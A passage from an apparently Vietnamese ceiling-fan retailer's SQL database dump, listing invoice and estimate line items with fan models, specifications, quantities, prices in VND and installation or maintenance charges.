/>\r\nBộ điều khiển từ xa RF đi kèm', 3.00, 6100000.00, '', 1, 0, '', 0.00),
(962, 204, 'estimate', 'Nhân công lắp đặt quạt trần', '', 3.00, 500000.00, 'cái', 2, 0, '', 0.00),
(963, 298, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 3.00, 6100000.00, '', 1, 0, NULL, 0.00),
(964, 298, 'invoice', 'Nhân công lắp đặt quạt trần', '', 3.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(965, 205, 'estimate', 'Haiku L 52 inch Caramel', 'Sải cánh 112cm (44 inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: White/ Caramel<br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA ', 1.00, 17850000.00, '', 1, 0, '', 0.00),
(966, 205, 'estimate', 'Bộ đèn LED Haiku L series', '', 1.00, 2500000.00, 'cái', 2, 0, '', 0.00),
(967, 205, 'estimate', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 3, 0, '', 0.00),
(968, 206, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood', 'Sải cánh 152cm ( ~ 60inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W   <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)   <br />\r\nMàu thân quạt: Matt Black (Trắng mờ sơn tĩnh điện)   <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)   <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'cái', 1, 25, '', 0.00),
(969, 206, 'estimate', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00);
INSERT INTO `tblitemable` (`id`, `rel_id`, `rel_type`, `description`, `long_description`, `qty`, `rate`, `unit`, `item_order`, `discount`, `item_image`, `wh_delivered_quantity`) VALUES
(970, 299, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: NW1902 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 2.00, 8400000.00, '', 1, 40, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(971, 300, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'Cái', 1, 30, 'https://hgphome.com/uploads/items/1942/thumb_abacus-crm_img.jpg', 0.00),
(972, 300, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(973, 207, 'estimate', 'Bộ điều khiển DC 6 tốc độ Sunon/Taiwan', '', 1.00, 3000000.00, '', 1, 0, '', 0.00),
(974, 301, 'invoice', 'Bộ điều khiển DC 6 tốc độ Sunon/Taiwan', '', 1.00, 3000000.00, '', 1, 0, NULL, 0.00),
(975, 208, 'estimate', 'Bộ điều khiển DC 6 tốc độ của Sunon/Taiwan', '', 1.00, 3000000.00, '', 1, 0, '', 0.00),
(976, 302, 'invoice', 'Bộ điều khiển DC 6 tốc độ của Sunon/Taiwan', '', 1.00, 3000000.00, '', 1, 0, NULL, 0.00),
(977, 209, 'estimate', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT', '', 1.00, 500000.00, '', 1, 0, '', 0.00),
(978, 209, 'estimate', 'Bảo dưỡng và Thay bộ điều khiển quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần,    <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 450000.00, 'cái', 2, 0, '', 0.00),
(979, 303, 'invoice', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT', '', 1.00, 500000.00, '', 1, 0, NULL, 0.00),
(980, 303, 'invoice', 'Bảo dưỡng và Thay bộ điều khiển quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần,    <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 450000.00, '', 2, 0, NULL, 0.00),
(981, 297, 'invoice', 'Chi phí vận chuyển', '', 1.00, 750000.00, 'lô', 2, 50, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(982, 210, 'estimate', 'Bộ điều khiển DC 6 tốc độ Mountair Air', '', 1.00, 750000.00, '', 1, 0, '', 0.00),
(983, 210, 'estimate', 'Chi phí Bảo Trì, Bảo dưỡng quath', '', 1.00, 350000.00, 'cái', 2, 0, '', 0.00),
(984, 211, 'estimate', 'Haiku 52 inch Cocoa Bamboo, Low Profile Black', 'Sải cánh 132cm (52 inch)       <br />\r\nMàu cánh: Cocoa Bamboo        <br />\r\nMàu thân : Low Profile / Universal Black       <br />\r\nĐộng cơ EC, công suất 29.3W       <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm       <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)       <br />\r\nBộ đèn LED tuỳ chọn thêm       <br />\r\nThương hiệu: Haiku/USA ', 1.00, 42900000.00, '', 1, 10, '', 0.00),
(985, 211, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(986, 211, 'estimate', 'Bộ đèn LED Haiku - H Series - 006580 (Indoor)', 'Viền màu Đen/Trăng theo màu thân quạt Haiku  <br />\r\nÁnh sáng 2700k, điều chỉnh màu 16 cấp dimmable từ điều khiển hoặc APP  <br />\r\nCông suất: 16.3 W <br />\r\nLumen: 1280 lumens, CRI: 82 <br />\r\nThương hiệu: Haiku/Sản xuất tại USA', 1.00, 8200000.00, 'cái', 3, 0, '', 0.00),
(987, 212, 'estimate', 'Haiku L 52 inch White', 'Sải cánh 132cm (52inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Trắng  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA', 4.00, 21500000.00, '', 1, 20, '', 0.00),
(989, 212, 'estimate', 'Bộ đèn LED Haiku L series', 'Độ sáng 16 cấp điều chỉnh dimmable<br />\r\nÁnh sáng: 2700K<br />\r\nCông suất 16.3W<br />\r\nBộ đèn chỉ dùng cho quạt Haiku L series', 4.00, 3600000.00, 'cái', 2, 0, '', 0.00),
(990, 212, 'estimate', 'Nhân công lắp đặt quạt trần', '', 4.00, 500000.00, 'cái', 3, 0, '', 0.00),
(991, 213, 'estimate', 'Quạt trần 5 cánh gỗ NEXUS 60 maple wood', 'Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Đen   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China   <br />\r\n   <br />\r\n', 1.00, 7900000.00, 'cái', 1, 25, '', 0.00),
(992, 304, 'invoice', 'Quạt trần 5 cánh gỗ NEXUS 60 maple wood, thân trắng, cánh gỗ sáng', 'Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Trắng<br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China', 1.00, 5800000.00, 'cái', 1, 0, NULL, 0.00),
(993, 305, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'Cái', 1, 30, 'https://hgphome.com/uploads/items/1942/thumb_abacus-crm_img.jpg', 0.00),
(994, 306, 'invoice', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', '', 1.00, 750000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(995, 307, 'invoice', 'Quạt trần cánh lớn Powerful S1 sải cánh 3m', '', 2.00, 27000000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(996, 308, 'invoice', 'Bộ điều khiển DC 6 tốc độ Mountair Air', '', 1.00, 750000.00, '', 1, 0, NULL, 0.00),
(997, 308, 'invoice', 'Chi phí Bảo Trì, Bảo dưỡng quath', '', 1.00, 350000.00, 'cái', 2, 0, NULL, 0.00),
(998, 309, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 1, 0, NULL, 0.00),
(1000, 214, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 1, 0, '', 0.00),
(1001, 214, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm ', 1.00, 6500000.00, 'cái', 2, 20, '', 0.00),
(1002, 215, 'estimate', 'Thay mới động cơ quạt Sino', 'Bảo hành 03 tháng', 2.00, 2500000.00, 'cái', 1, 0, '', 0.00),
(1004, 216, 'estimate', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 1, 0, '', 0.00),
(1007, 217, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 1, 0, '', 0.00),
(1008, 216, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 ', 'Model: NW1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Cherry ( chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6000000.00, '', 2, 0, '', 0.00),
(1009, 310, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 1, 0, NULL, 0.00),
(1010, 310, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60', 'Model: NW1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Cherry ( chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6000000.00, '', 2, 0, NULL, 0.00),
(1012, 217, 'estimate', 'Haiku L 52 inch White - Caramel', 'Sải cánh 132cm (52inch)       <br />\r\nĐộng cơ EC, công suất 20.9W       <br />\r\nMàu thân/cánh: Trắng     <br />\r\nMàu cánh: Caramel   <br />\r\nĐiều khiển từ xa 7 cấp đi kèm    <br />\r\nTuỳ chọn thêm: Đèn LED 2700K dimmble qua điều khiển và APP; Module 0-10V; Module WiFi (điều khiển qua APP)    <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)', 1.00, 23800000.00, 'bộ', 2, 15, '', 0.00),
(1013, 218, 'estimate', 'Haiku 60 inch Caramel Bamboo, Low Profile Black', 'Sải cánh 150cm (60 inch)       <br />\r\nMàu cánh: Caramel Bamboo        <br />\r\nMàu thân : Low Profile Black       <br />\r\nĐộng cơ EC, công suất 29.3W       <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm       <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)       <br />\r\nBộ đèn LED tuỳ chọn thêm       <br />\r\nThương hiệu: Haiku/USA', 1.00, 35700000.00, 'cái', 1, 10, '', 0.00),
(1014, 218, 'estimate', 'Hoàn trả Quạt trần cao cấp IRIS 60 Black ABS', 'Quạt trần HVLS Modern IRIS 60     <br />\r\nSải cánh: 152cm     <br />\r\nMàu sắc: Đen    <br />\r\nĐộng cơ EC, công suất 55 W (max speed)     <br />\r\nĐiều khiển 6 tốc độ đi kèm     <br />\r\nThương hiệu: SUNON/Taiwan', 1.00, -12300000.00, 'cái', 2, 5, '', 0.00),
(1015, 215, 'estimate', 'Sửa chữa quạt trần: thay bạc đạn cho quạt', 'Bảo hành 03 tháng', 2.00, 1800000.00, 'cái', 2, 0, '', 0.00),
(1016, 215, 'estimate', 'Nhân công sửa chữa', '', 4.00, 350000.00, 'cái', 3, 0, '', 0.00),
(1017, 311, 'invoice', 'Haiku L 52 inch White', 'Sải cánh 132cm (52inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Trắng  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA', 4.00, 21500000.00, '', 1, 20, NULL, 0.00),
(1018, 311, 'invoice', 'Bộ đèn LED Haiku L series', 'Độ sáng 16 cấp điều chỉnh dimmable<br />\r\nÁnh sáng: 2700K<br />\r\nCông suất 16.3W<br />\r\nBộ đèn chỉ dùng cho quạt Haiku L series', 4.00, 3600000.00, 'cái', 2, 0, NULL, 0.00),
(1019, 311, 'invoice', 'Nhân công lắp đặt quạt trần Haiku', '', 4.00, 500000.00, 'cái', 3, 0, NULL, 0.00),
(1020, 312, 'invoice', 'Quạt trần KATRINA Gray Dark Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: nâu cánh gián   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 1.00, 6500000.00, 'Cái', 1, 25, 'https://hgphome.com/uploads/items/1940/thumb_katrina_dark.jpg', 0.00),
(1021, 312, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(1022, 219, 'estimate', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '', 2.00, 750000.00, '', 1, 0, '', 0.00),
(1023, 220, 'estimate', 'Quạt trần 5 cánh gỗ NEXUS 60 Dark wood', 'Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Dark Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Đen   <br />\r\nMàu cánh: Dark Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China', 2.00, 7900000.00, 'cái', 1, 40, '', 0.00),
(1024, 313, 'invoice', 'Quạt trần 5 cánh gỗ NEXUS 60 Dark wood', 'Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Dark Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Đen   <br />\r\nMàu cánh: Dark Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China', 2.00, 7900000.00, 'cái', 1, 40, NULL, 0.00),
(1025, 314, 'invoice', 'Haiku 60 inch Caramel Bamboo, Low Profile Black', 'Sải cánh 150cm (60 inch)       <br />\r\nMàu cánh: Caramel Bamboo        <br />\r\nMàu thân : Low Profile Black       <br />\r\nĐộng cơ EC, công suất 29.3W       <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm       <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)       <br />\r\nBộ đèn LED tuỳ chọn thêm       <br />\r\nThương hiệu: Haiku/USA', 1.00, 35700000.00, 'cái', 1, 10, NULL, 0.00),
(1026, 314, 'invoice', 'Hoàn trả Quạt trần cao cấp IRIS 60 Black ABS', 'Quạt trần HVLS Modern IRIS 60     <br />\r\nSải cánh: 152cm     <br />\r\nMàu sắc: Đen    <br />\r\nĐộng cơ EC, công suất 55 W (max speed)     <br />\r\nĐiều khiển 6 tốc độ đi kèm     <br />\r\nThương hiệu: SUNON/Taiwan', 1.00, -12300000.00, 'cái', 2, 5, NULL, 0.00),
(1027, 315, 'invoice', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 2.00, 6300000.00, 'cái', 1, 35, 'https://hgphome.com/uploads/items/1855/thumb_sino-52-white.jpg', 0.00),
(1028, 316, 'invoice', 'Quạt trần 5 cánh gỗ NEXUS 60 maple wood', 'Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Trắng/Đen   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China', 1.00, 7900000.00, 'cái', 1, 25, 'https://hgphome.com/uploads/items/1953/thumb_nexus-60.jpg', 0.00),
(1029, 316, 'invoice', 'Chi phí vận chuyển', 'Vận chuyển đến tận nơi tại Nha Trang', 1.00, 0.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1030, 317, 'invoice', 'Ống ty treo quạt trần.', 'Ống ty treo quạt trần nhà ở, chung cư.', 1.00, 550000.00, 'cây', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1031, 317, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'Cái', 2, 20, 'https://hgphome.com/uploads/items/1942/thumb_abacus-crm_img.jpg', 0.00),
(1032, 221, 'estimate', 'Haiku I 52 inch White with SenseME', 'Model: <br />\r\nSải cánh: 132cm (52 inch), thiết kế sát trần (Low-Profile) <br />\r\nThân màu: Trắng <br />\r\nMàu cánh: Trắng, chất liệu nhựa Composite có độ bền cao <br />\r\nThiết kế tích hợp SenseME - cảm biến nhiệt, độ ẩm, cảm biến chuyển động hồng ngoại. (Made in USA) <br />\r\nĐiều khiển 7 tốc độ đi kèm <br />\r\nBộ đèn: Chưa bao gồm <br />\r\nThương hiệu: Haiku/USA', 1.00, 28500000.00, '', 1, 0, '', 0.00),
(1033, 221, 'estimate', 'Haiku L 52 inch White - Caramel', 'Sải cánh 132cm (52inch)       <br />\r\nĐộng cơ EC, công suất 20.9W       <br />\r\nMàu thân/cánh: Trắng     <br />\r\nMàu cánh: Caramel   <br />\r\nĐiều khiển từ xa 7 cấp đi kèm    <br />\r\nTuỳ chọn thêm: Đèn LED 2700K dimmble qua điều khiển và APP; Module 0-10V; Module WiFi (điều khiển qua APP)    <br />\r\nThương hiệu: Haiku/USA', 2.00, 17500000.00, 'bộ', 2, 0, '', 0.00),
(1034, 221, 'estimate', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'lô', 3, 0, '', 0.00),
(1035, 222, 'estimate', 'Quạt trần 5 cánh gỗ NEXUS 60 maple wood', 'Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp<br />\r\nMàu thân: Trắng   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China   <br />\r\n   <br />\r\n', 1.00, 5900000.00, 'cái', 1, 0, '', 0.00),
(1036, 222, 'estimate', 'Quạt trần SAONA 52 LED WHITE 52YFT-7062W (màu trắng)', 'Sải cánh 132cm   <br />\r\nĐộng cơ DC, công suất 36W  <br />\r\nĐiều khiển 6 cấp độ   <br />\r\nMàu sắc: Trắng  <br />\r\nĐèn LED 12W, ánh sáng 3 màu  <br />\r\nThương hiệu: Mountain Air/China', 2.00, 4600000.00, '', 2, 0, '', 0.00),
(1037, 222, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Trắng  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm ', 1.00, 4800000.00, 'cái', 3, 0, '', 0.00),
(1038, 222, 'estimate', 'Nhân công lắp đặt quạt trần ', '', 4.00, 500000.00, 'cái', 4, 0, '', 0.00),
(1039, 318, 'invoice', 'Quạt trần KATRINA Gray Dark Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ Cánh Gián (Dark Wanut Gray Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 1.00, 6500000.00, 'Cái', 1, 25, 'https://hgphome.com/uploads/items/1940/thumb_katrina_dark.jpg', 0.00),
(1041, 223, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 4700000.00, 'cái', 1, 0, '', 0.00),
(1048, 224, 'estimate', 'Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades', 'Sải cánh 132cm <br />\r\nĐộng cơ DC, 35W hoạt động Êm, tiết kiệm điện <br />\r\nĐiều khiển 6 tốc độ <br />\r\nThương hieuej: WildMill / Made in India (Ấn Độ) <br />\r\nThiết kế dựa trên nguyên bản Marelli (Ý) <br />\r\nMotor đúc nguyên khối nhôm, có độ bền tản nhiệt cao', 12.00, 16900000.00, '', 1, 15, '', 0.00),
(1049, 224, 'estimate', 'Móc treo gia cố quạt trần', 'Sử dụng cho trần bê tông  <br />\r\nKhoảng cách từ bê tông - tấm thạch cao : 35-100cm  <br />\r\nTùy chỉnh theo độ cao trần theo sắt V đục lỗ ốc 10mm<br />\r\nDây cáp an toàn chổng rung lắc', 12.00, 800000.00, 'cái', 2, 0, '', 0.00),
